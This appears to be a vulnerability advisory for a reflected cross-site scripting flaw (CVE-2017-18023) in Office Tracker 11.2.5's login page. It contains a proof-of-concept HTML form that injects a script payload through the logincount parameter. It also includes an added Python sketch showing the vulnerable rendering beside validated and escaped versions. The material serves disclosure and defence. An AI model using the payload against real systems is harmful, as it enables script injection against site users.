Office Tracker version 11.2.5 suffers from a cross site scripting vulnerability.
# Title: Office Tracker 11.2.5 - XSS
# Author: Nassim Asrir
# Contact: [email protected]
# Vendor: https://www.officetracker.com/
# CVE: CVE-2017-18023
# Description
Office Tracker 11.2.5 has XSS via the
logincount parameter to the /otweb/OTPClientLogin URI.
------------------------------------------
# Details
The value of the logincount request parameter is copied into the HTML
document as plain text between tags. The payload
chfkh<script>alert(1)</script>p9glb was submitted in the logincount
parameter. This input was echoed unmodified in the application's
response.
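
An added example, not part of the original advisory or the vendor's code: a Python sketch of the reflection described above beside a hardened render. It assumes logincount is a numeric counter; the page template, function names and sample request body are constructed for illustration.

```python
import html
from urllib.parse import parse_qs

# Constructed request body modelled on the advisory's form fields.
SAMPLE_BODY = (
    "logincount=0chfkh%3Cscript%3Ealert(1)%3C%2Fscript%3Ep9glb"
    "&lastname=MorisonM&login=admin&submitbtn=Login"
)

# Hypothetical template: the value is placed as text between tags.
PAGE = "<html><body><p>Login attempts: {count}</p></body></html>"


def form_value(body: str, name: str) -> str:
    """Return the first value of a urlencoded form field, or ''."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(body: str) -> str:
    """The pattern the advisory describes: the raw value lands between tags."""
    return PAGE.format(count=form_value(body, "logincount"))


def parse_logincount(raw: str, maximum: int = 1000) -> int:
    """Accept only a short run of ASCII digits; anything else resets to 0."""
    if raw.isascii() and raw.isdigit() and len(raw) <= 4:
        return min(int(raw), maximum)
    return 0


def render_hardened(body: str) -> str:
    """Validate the counter as an integer, then HTML-encode at the output point."""
    count = parse_logincount(form_value(body, "logincount"))
    return PAGE.format(count=html.escape(str(count)))


def render_encoded_only(body: str) -> str:
    """Output encoding alone, for fields that must stay free text."""
    return PAGE.format(count=html.escape(form_value(body, "logincount")))


if __name__ == "__main__":
    for render in (render_vulnerable, render_hardened, render_encoded_only):
        print(render.__name__, "->", render(SAMPLE_BODY))
```

Type validation removes the injected markup entirely, while output encoding keeps it inert if a malformed value ever reaches the template.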
------------------------------------------
# Vulnerability Type
Cross Site Scripting (XSS)
------------------------------------------
# Attack Type
Remote
------------------------------------------
# POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://server/otweb/OTPClientLogin" method="POST">
<input type="hidden" name="logincount" value="0chfkh<script>alert(1)</script>p9glb" />
<input type="hidden" name="lastname" value="MorisonM" />
<input type="hidden" name="timezone" value="" />
<input type="hidden" name="uid" value="" />
<input type="hidden" name="phone" value="false" />
<input type="hidden" name="login" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="submitbtn" value="Login" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
------------------------------------------